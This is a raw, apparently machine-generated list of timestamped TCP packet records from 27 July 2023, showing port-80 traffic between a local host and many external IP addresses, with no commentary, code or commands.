                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192822933 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192843914 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192863941 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192867994 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192893028 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192910910 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192915916 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192935944 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192953110 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.192971945 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193062067 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193659067 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193696022 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193725109 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193751097 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193769932 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193769932 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193775892 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193799019 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193806887 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193816900 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193833113 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193857908 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193881989 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193887949 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193907976 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193912983 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193953037 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.193979979 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194576025 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194606066 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194632053 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194657087 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194678068 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194680929 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194703102 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194706917 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194721937 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194734097 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194741011 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194760084 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194761992 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194787979 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194812059 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194830894 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194844961 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.194899082 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195478916 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195507050 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195554972 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195715904 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195744991 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195760965 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195770025 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195797920 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195822954 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195848942 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195867062 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195877075 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195894003 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195904016 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195929050 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195954084 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195959091 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.195979118 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.196002007 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.196630001 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.196660042 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.196685076 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.196702957 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.196950912 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.198246956 CEST4971780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.236880064 CEST8049717185.80.51.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.240190983 CEST4971780192.168.2.4185.80.51.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.274003029 CEST8049708202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.274099112 CEST4970880192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.291162968 CEST804971818.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.291212082 CEST804971818.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.291290045 CEST4971880192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.291290045 CEST4971880192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.322964907 CEST4971880192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.322967052 CEST4971580192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.428467035 CEST804971660.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.429006100 CEST804971660.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.429404974 CEST4971680192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.471313953 CEST804971818.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.489165068 CEST804971569.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.489483118 CEST804971569.163.239.62192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.489629030 CEST4971580192.168.2.469.163.239.62
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.560290098 CEST4971980192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.601488113 CEST4971680192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.647057056 CEST4972080192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.681909084 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.692492008 CEST8049720193.166.255.171192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.692579031 CEST4972080192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.692889929 CEST4972080192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.701608896 CEST4972280192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.708488941 CEST804972182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.708764076 CEST804971918.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.708863974 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.709458113 CEST4971980192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.709458113 CEST4971980192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.709466934 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.731677055 CEST804972246.242.238.60192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.731823921 CEST4972280192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.732176065 CEST4972280192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.735878944 CEST804972182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.737782955 CEST8049720193.166.255.171192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.737847090 CEST8049720193.166.255.171192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.743314028 CEST804972182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.744460106 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.762283087 CEST4972380192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.764107943 CEST4972480192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.764240980 CEST804972246.242.238.60192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.765132904 CEST804972246.242.238.60192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.765247107 CEST4972280192.168.2.446.242.238.60
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.787647009 CEST804972434.117.168.233192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.787787914 CEST4972480192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.800051928 CEST4968380192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.815098047 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.833077908 CEST4972480192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.843456030 CEST4972580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.848664999 CEST804972182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.848865032 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.857362032 CEST804972434.117.168.233192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.857403040 CEST804971918.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.857439995 CEST804971918.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.857532024 CEST4971980192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.861895084 CEST804972434.117.168.233192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.862046957 CEST4972480192.168.2.434.117.168.233
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.886106014 CEST8049723108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.886346102 CEST4972380192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.890676975 CEST804971660.43.154.138192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.890818119 CEST4971680192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.967876911 CEST804972572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.968317032 CEST4972580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.999629021 CEST4971980192.168.2.418.119.154.66
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.112463951 CEST4972380192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.147671938 CEST804971918.119.154.66192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.206212044 CEST4972580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.237190008 CEST8049723108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.245815992 CEST8049723108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.248328924 CEST4972380192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.329009056 CEST4972380192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.330015898 CEST804972572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.331413984 CEST804972572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.331460953 CEST804972572.44.93.236192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.331667900 CEST4972580192.168.2.472.44.93.236
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.460345030 CEST8049723108.167.164.216192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.460516930 CEST4972380192.168.2.4108.167.164.216
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.545272112 CEST4972680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.545727968 CEST4972780192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.545831919 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.561933041 CEST8049726188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.562134981 CEST4972680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.569793940 CEST8049727217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.569988966 CEST4972780192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.579874992 CEST804972881.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.580014944 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.625135899 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.625139952 CEST4972680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.625139952 CEST4972780192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.625777960 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.641645908 CEST8049726188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.648257971 CEST4973080192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.649230957 CEST8049727217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.650316000 CEST8049727217.19.237.54192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.650454998 CEST4972780192.168.2.4217.19.237.54
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.655797958 CEST8049726188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.655957937 CEST4972680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.659322977 CEST804972881.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.665829897 CEST804972881.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.667387009 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.691972971 CEST8049712135.181.73.98192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.692059994 CEST4971280192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.751032114 CEST804973051.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.751133919 CEST4973080192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.751614094 CEST804972966.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.751694918 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.755091906 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.756529093 CEST4973080192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.756587982 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.757021904 CEST4973180192.168.2.477.68.50.105
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.761178970 CEST4973280192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.789469004 CEST804973177.68.50.105192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.789582014 CEST4973180192.168.2.477.68.50.105
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.791069984 CEST4973180192.168.2.477.68.50.105
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.791352987 CEST4973380192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.795484066 CEST804972881.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.795598030 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.823580027 CEST804973177.68.50.105192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.823640108 CEST804973177.68.50.105192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.823771954 CEST4973180192.168.2.477.68.50.105
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.849776983 CEST804972182.201.61.230192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.849857092 CEST4972180192.168.2.482.201.61.230
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.859225988 CEST804973051.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.859265089 CEST804973051.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.859344959 CEST4973080192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.875000954 CEST4973080192.168.2.451.79.51.72
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.882553101 CEST804972966.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.884594917 CEST804972966.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.884700060 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.935178995 CEST8049733104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.935295105 CEST4973380192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.949486017 CEST4973180192.168.2.477.68.50.105
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.951033115 CEST4973380192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.952486038 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.977776051 CEST804973051.79.51.72192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.981873989 CEST804973177.68.50.105192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.982110023 CEST804973177.68.50.105192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.982296944 CEST4973180192.168.2.477.68.50.105
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.022671938 CEST4973480192.168.2.496.127.180.42
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.023017883 CEST4973580192.168.2.413.248.169.48
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.045526028 CEST4973680192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.082990885 CEST804972966.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.083112001 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.094381094 CEST8049733104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.095733881 CEST8049733104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.095974922 CEST4973380192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.162837982 CEST4973380192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.306399107 CEST8049733104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.307008028 CEST8049733104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.307199955 CEST4973380192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.472780943 CEST804972966.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.473006010 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.479609013 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.499007940 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.499335051 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.500231981 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.519524097 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.520051956 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.520251989 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.523493052 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.542526007 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.543181896 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.543512106 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.545686960 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.565217018 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.565507889 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.568337917 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.587966919 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.590549946 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.592839956 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.612694025 CEST80497373.65.101.129192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.612929106 CEST4973780192.168.2.43.65.101.129
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.746778011 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.746938944 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.747710943 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.796051025 CEST804972881.2.194.241192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.797482967 CEST4972880192.168.2.481.2.194.241
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.830611944 CEST4973980192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.913383007 CEST804968580.93.82.33192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.916516066 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.950716972 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951211929 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951268911 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951314926 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951368093 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951416016 CEST8049738122.128.109.107192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.951441050 CEST4973880192.168.2.4122.128.109.107
